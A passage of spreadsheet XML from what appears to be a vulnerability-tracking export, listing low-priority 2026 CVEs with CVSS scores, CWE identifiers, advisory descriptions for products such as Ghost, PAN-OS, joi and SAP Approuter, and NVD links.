    </row>
    <row r="2214">
      <c r="A2214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70591</t>
        </is>
      </c>
      <c r="C2214" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="D2214" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2214" s="5" t="inlineStr"/>
      <c r="F2214" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2214" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2214" s="5" t="inlineStr"/>
      <c r="I2214" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2214" s="5" t="inlineStr"/>
      <c r="K2214" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2214" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 0.10.0 until 6.54.1, a Server-Side Request Forgery in Ghost Admin image fetching allowed any staff-level user to perform a blind HTTP GET request against internal hosts. No output was returned, but this could have been used to probe open ports on internal hosts. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M2214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70591</t>
        </is>
      </c>
    </row>
    <row r="2215">
      <c r="A2215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0309</t>
        </is>
      </c>
      <c r="C2215" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D2215" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2215" s="5" t="inlineStr"/>
      <c r="F2215" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2215" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H2215" s="5" t="inlineStr"/>
      <c r="I2215" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2215" s="5" t="inlineStr"/>
      <c r="K2215" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2215" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in Palo Alto Networks PAN-OS® software enables an authenticated administrator to bypass system restrictions and run arbitrary commands as a root user. To be able to exploit this issue, the user must have access to the PAN-OS CLI and the device must be configured with a Luna Hardware Security Module (HSM). 
The security risk posed by this issue is significantly minimized when CLI access is restricted to a limited group of administrators.
Panorama, Cloud NGFW, and Prisma® Access are not impacted by this vulnerability.</t>
        </is>
      </c>
      <c r="M2215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0309</t>
        </is>
      </c>
    </row>
    <row r="2216">
      <c r="A2216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28581</t>
        </is>
      </c>
      <c r="C2216" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D2216" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2216" s="5" t="inlineStr"/>
      <c r="F2216" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2216" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2216" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I2216" s="5" t="inlineStr">
        <is>
          <t>2026-06-01</t>
        </is>
      </c>
      <c r="J2216" s="5" t="inlineStr"/>
      <c r="K2216" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2216" s="5" t="inlineStr">
        <is>
          <t>In fixInitiatingUserIfNecessary of CallIntentProcessor.java, there is a possible way to make an emergency call due to a logic error in the code. This could lead to local escalation with User execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M2216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28581</t>
        </is>
      </c>
    </row>
    <row r="2217">
      <c r="A2217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70595</t>
        </is>
      </c>
      <c r="C2217" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D2217" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2217" s="5" t="inlineStr"/>
      <c r="F2217" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2217" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2217" s="5" t="inlineStr"/>
      <c r="I2217" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2217" s="5" t="inlineStr"/>
      <c r="K2217" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2217" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 6.26.0 until 6.54.1, a validation issue allowed some functionality, such as Webmentions, to be abused by an unauthenticated user to make limited HTTP requests to hosts in the Ghost server's internal network. A successful attack would not result in any response data being returned. This vulnerability is fixed in 6.54.1.</t>
        </is>
      </c>
      <c r="M2217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70595</t>
        </is>
      </c>
    </row>
    <row r="2218">
      <c r="A2218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80159</t>
        </is>
      </c>
      <c r="C2218" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D2218" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2218" s="5" t="inlineStr"/>
      <c r="F2218" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2218" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2218" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2218" s="5" t="inlineStr"/>
      <c r="K2218" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L2218" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Untrusted Search Path vulnerability that could result in privilege escalation. An attacker with high privileges could leverage this vulnerability to gain elevated access. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80159</t>
        </is>
      </c>
    </row>
    <row r="2219">
      <c r="A2219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88059</t>
        </is>
      </c>
      <c r="C2219" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D2219" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2219" s="5" t="inlineStr"/>
      <c r="F2219" s="5" t="inlineStr"/>
      <c r="G2219" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2219" s="5" t="inlineStr"/>
      <c r="I2219" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2219" s="5" t="inlineStr"/>
      <c r="K2219" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-524</t>
        </is>
      </c>
      <c r="L2219" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.28, 21.2.20, and 22.1.1, Angular's @angular/common HttpTransferCache can cache an authenticated response when Server-Side Rendering (SSR) and hydration use a hierarchical HttpClient configured with withRequestsMadeViaParent. The child TransferCache evaluates an initially anonymous request before delegation, then a parent withInterceptors chain adds an Authorization header, cookie, or API token; although the parent cache skips the authenticated request, the child still stores the private response in TransferState serialized as JSON in the ng-state script. Exploitation requires provideClientHydration, child provideHttpClient delegation through withRequestsMadeViaParent, parent-level credential injection, and an SSR HTML response shared across users by a CDN, reverse proxy, or application cache. A later unauthenticated or unauthorized visitor can receive the cached HTML containing the earlier authenticated user's sensitive response data. Applications can mitigate by attaching credentials at the child, filtering sensitive endpoints with withHttpTransferCacheOptions, disabling transfer caching for sensitive routes, or marking personalized HTML private or no-store. This issue is fixed in versions 20.3.28, 21.2.20, and 22.1.1.</t>
        </is>
      </c>
      <c r="M2219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88059</t>
        </is>
      </c>
    </row>
    <row r="2220">
      <c r="A2220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70598</t>
        </is>
      </c>
      <c r="C2220" s="5" t="n">
        <v>3.9</v>
      </c>
      <c r="D2220" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2220" s="5" t="inlineStr"/>
      <c r="F2220" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2220" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2220" s="5" t="inlineStr"/>
      <c r="I2220" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2220" s="5" t="inlineStr"/>
      <c r="K2220" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2220" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.10, 40.9.0, 41.2.1, and 42.0.0-beta.3, offscreen rendering frame data received from the GPU process was not fully validated by the main process. A compromised GPU process could cause the main process to read out-of-bounds memory while producing paint event images, disclosing memory or crashing the app. This issue is fixed in 39.8.10, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M2220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70598</t>
        </is>
      </c>
    </row>
    <row r="2221">
      <c r="A2221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70467</t>
        </is>
      </c>
      <c r="C2221" s="5" t="n">
        <v>3.8</v>
      </c>
      <c r="D2221" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2221" s="5" t="inlineStr"/>
      <c r="F2221" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2221" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H2221" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortisiem</t>
        </is>
      </c>
      <c r="I2221" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2221" s="5" t="inlineStr"/>
      <c r="K2221" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2221" s="5" t="inlineStr">
        <is>
          <t>A server-side request forgery (ssrf) vulnerability in Fortinet FortiSIEM 7.5.0, FortiSIEM 7.4.0 through 7.4.2, FortiSIEM 7.3.0 through 7.3.5, FortiSIEM 7.2 all versions, FortiSIEM 7.1 all versions, FortiSIEM 7.0 all versions, FortiSIEM 6.7 all versions, FortiSIEM 6.6 all versions, FortiSIEM 6.5 all versions may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M2221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70467</t>
        </is>
      </c>
    </row>
    <row r="2222">
      <c r="A2222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55785</t>
        </is>
      </c>
      <c r="C2222" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D2222" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2222" s="5" t="inlineStr"/>
      <c r="F2222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2222" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2222" s="5" t="inlineStr"/>
      <c r="I2222" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2222" s="5" t="inlineStr"/>
      <c r="K2222" s="5" t="inlineStr">
        <is>
          <t>CWE-208, CWE-385, CWE-532</t>
        </is>
      </c>
      <c r="L2222" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. Prior to 1.4.5, the AUSF component performs cryptographic authentication comparisons in internal/sbi/processor/ue_authentication.go with ordinary equality helpers. Auth5gAkaComfirmRequestProcedure compares RES* and XRES* with strings.EqualFold and logs the expected XRES* value at INFO level before comparison. EapAuthComfirmRequestProcedure compares AT_MAC and XMAC with bytes.Equal and evaluates XRES == RES with ordinary string equality. These comparisons can return at mismatch-dependent times, although testing did not demonstrate a practical remote timing oracle because of HTTP/SBI timing noise. The INFO log exposes authentication material to operators, log collectors, sidecars, or processes able to read AUSF logs. This issue is fixed in version 1.4.5.</t>
        </is>
      </c>
      <c r="M2222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55785</t>
        </is>
      </c>
    </row>
    <row r="2223">
      <c r="A2223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58239</t>
        </is>
      </c>
      <c r="C2223" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D2223" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2223" s="5" t="inlineStr"/>
      <c r="F2223" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2223" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2223" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I2223" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2223" s="5" t="inlineStr"/>
      <c r="K2223" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L2223" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently validate tenant context in inbound requests. An unauthenticated attacker could send specially crafted requests to spoof the tenant context under conditions not fully within their control. Successful exploitation could allow limited access to another tenant's information, resulting in a low impact on confidentiality. There is no impact on integrity and availability.</t>
        </is>
      </c>
      <c r="M2223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58239</t>
        </is>
      </c>
    </row>
    <row r="2224">
      <c r="A2224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66774</t>
        </is>
      </c>
      <c r="C2224" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D2224" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2224" s="5" t="inlineStr"/>
      <c r="F2224" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2224" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2224" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I2224" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2224" s="5" t="inlineStr"/>
      <c r="K2224" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L2224" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not consistently handle certain error conditions. An attacker with low privileges could exploit this under a non-default configuration. Successful exploitation is highly complex, as it depends on conditions outside the attacker's control. This could result in a low impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="M2224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66774</t>
        </is>
      </c>
    </row>
    <row r="2225">
      <c r="A2225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71849</t>
        </is>
      </c>
      <c r="C2225" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D2225" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2225" s="5" t="inlineStr"/>
      <c r="F2225" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2225" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2225" s="5" t="inlineStr"/>
      <c r="I2225" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2225" s="5" t="inlineStr"/>
      <c r="K2225" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2225" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. From 4.7.0 to 4.12.33, the Proxy Helper proxy() function in hono/proxy does not remove response headers named by the origin's Connection header. Per RFC 9110 Section 7.6.1, an intermediary must remove the header fields listed in a message's Connection header field before forwarding the message, in addition to the well known hop by hop headers, but the proxy() function only removed the well known hop by hop headers, including Connection itself, from origin responses. A client may therefore receive response headers that the origin intended only for its immediate peer, disclosing connection scoped or internal metadata contained in such headers, when an application proxies responses from an origin that declares additional, non standard headers as hop by hop via the Connection response header. This issue is fixed in version 4.12.34.</t>
        </is>
      </c>
      <c r="M2225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71849</t>
        </is>
      </c>
    </row>
    <row r="2226">
      <c r="A2226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73425</t>
        </is>
      </c>
      <c r="C2226" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D2226" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2226" s="5" t="inlineStr"/>
      <c r="F2226" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2226" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H2226" s="5" t="inlineStr"/>
      <c r="I2226" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2226" s="5" t="inlineStr"/>
      <c r="K2226" s="5" t="inlineStr">
        <is>
          <t>CWE-185</t>
        </is>
      </c>
      <c r="L2226" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. Prior to 8.1.2, the Astro Netlify adapter converts each image.remotePatterns entry into a regular expression written to .netlify/v1/config.json under images.remote_images for Netlify's Image CDN allowlist. In packages/integrations/netlify/src/index.ts, remotePatternToRegex() escapes dots in hostname values but interpolates literal pathname values without escaping regular expression metacharacters such as ., +, ?, (, and [, so a restrictive pathname such as /img/v1.0/file also matches metacharacter-adjacent paths, including paths that cross a segment. Netlify enforces the generated regular expression directly and Astro's matchPattern() helper does not revalidate the request, allowing optimization of images on an already-allowed host that the declared pathname was intended to exclude. This issue is fixed in version 8.1.2.</t>
        </is>
      </c>
      <c r="M2226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73425</t>
        </is>
      </c>
    </row>
    <row r="2227">
      <c r="A2227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78124</t>
        </is>
      </c>
      <c r="C2227" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D2227" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2227" s="5" t="inlineStr"/>
      <c r="F2227" s="5" t="inlineStr"/>
      <c r="G2227" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H2227" s="5" t="inlineStr"/>
      <c r="I2227" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2227" s="5" t="inlineStr"/>
      <c r="K2227" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2227" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.0.2 through 6.0.7 allows PKCS#7 certificate enumeration in the openssl plugin that leads to a lack of release of memory after its effective lifetime.</t>
        </is>
      </c>
      <c r="M2227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78124</t>
        </is>
      </c>
    </row>
    <row r="2228">
      <c r="A2228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84367</t>
        </is>
      </c>
      <c r="C2228" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D2228" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2228" s="5" t="inlineStr"/>
      <c r="F2228" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2228" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2228" s="5" t="inlineStr"/>
      <c r="I2228" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2228" s="5" t="inlineStr"/>
      <c r="K2228" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L2228" s="5" t="inlineStr">
        <is>
          <t>joi is a schema description language and data validator for JavaScript. From 16.0.0 until 17.13.5 and 18.2.4, joi's lib/types/keys.js internals.rename() implementation used by object().rename() permits a schema that renames keys with a regular-expression source and a Joi.expression() or Joi.x() target that interpolates the pattern's own match data, combined with { multiple: true }, to derive a target from an attacker-controlled input key. An attacker can send x-__proto__ with an object value, causing the target to render as __proto__ and set the prototype of the object returned by validate() instead of creating an own key. The global Object.prototype is not modified, so the effect is confined to the object returned by that validation call. Static-string targets and schemas using the default { multiple: false } are not affected. This issue is fixed in versions 17.13.5 and 18.2.4.</t>
        </is>
      </c>
      <c r="M2228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t>
        </is>
      </c>
    </row>
    <row r="2229">
      <c r="A2229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84368</t>
        </is>
      </c>
      <c r="C2229" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D2229" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2229" s="5" t="inlineStr"/>
      <c r="F2229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2229" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2229" s="5" t="inlineStr"/>
      <c r="I2229" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2229" s="5" t="inlineStr"/>
      <c r="K2229" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L2229" s="5" t="inlineStr">
        <is>
          <t>joi is a schema description language and data validator for JavaScript. From 16.0.0 until 17.13.6 and 18.2.5, the @hapi/joi package through 17.1.1 and the successor joi package contain prototype pollution in lib/messages.js, where exports.compile() and exports.merge() reuse inherited objects for attacker-controlled language keys supplied through messages(), message(), prefs({ messages }), Joi.extend({ messages }), or rule({ message }). A language key named __proto__ writes properties onto Object.prototype, and constructor writes to the Object function's static properties. A consuming application that gates on the presence of an inherited property can take the wrong branch for every inspected object. The flaw is not reachable from data that joi validates and requires an application to feed untrusted input directly into schema-construction configuration. This issue is fixed in joi versions 17.13.6 and 18.2.5; no fixed @hapi/joi version is available.</t>
        </is>
      </c>
      <c r="M2229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t>
        </is>
      </c>
    </row>
    <row r="2230">
      <c r="A2230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2230" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15695</t>
        </is>
      </c>
      <c r="C2230" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D2230" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2230" s="5" t="inlineStr"/>
      <c r="F2230" s="5" t="inlineStr"/>
      <c r="G2230" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2230" s="5" t="inlineStr"/>
      <c r="I2230" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2230" s="5" t="inlineStr"/>
      <c r="K2230" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2230" s="5" t="inlineStr">
        <is>
          <t>The Translate WordPress with GTranslate WordPress plugin before 3.0.10 does not validate one of its settings before the bundled front-end scripts build markup from it, allowing users with a role as high as administrator to store JavaScript that runs in the session of any visitor to the site.</t>
        </is>
      </c>
      <c r="M2230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15695</t>
        </is>
      </c>
    </row>
    <row r="2231">
      <c r="A2231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69904</t>
        </is>
      </c>
      <c r="C2231" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D2231" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2231" s="5" t="inlineStr"/>
      <c r="F2231" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2231" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2231" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I2231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2231" s="5" t="inlineStr"/>
      <c r="K2231" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2231" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t>
        </is>
      </c>
    </row>
    <row r="2232">
      <c r="A2232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76960</t>
        </is>
      </c>
      <c r="C2232" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D2232" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2232" s="5" t="inlineStr"/>
      <c r="F2232" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2232" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2232" s="5" t="inlineStr"/>
      <c r="I2232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2232" s="5" t="inlineStr"/>
      <c r="K2232" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L2232"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M2232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t>
        </is>
      </c>
    </row>
    <row r="2233">
      <c r="A2233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76961</t>
        </is>
      </c>
      <c r="C2233" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="D2233" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E2233" s="5" t="inlineStr"/>
      <c r="F2233" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2233" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2233" s="5" t="inlineStr"/>
      <c r="I2233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2233" s="5" t="inlineStr"/>
      <c r="K2233" s="5" t="inlineStr">
        <is>
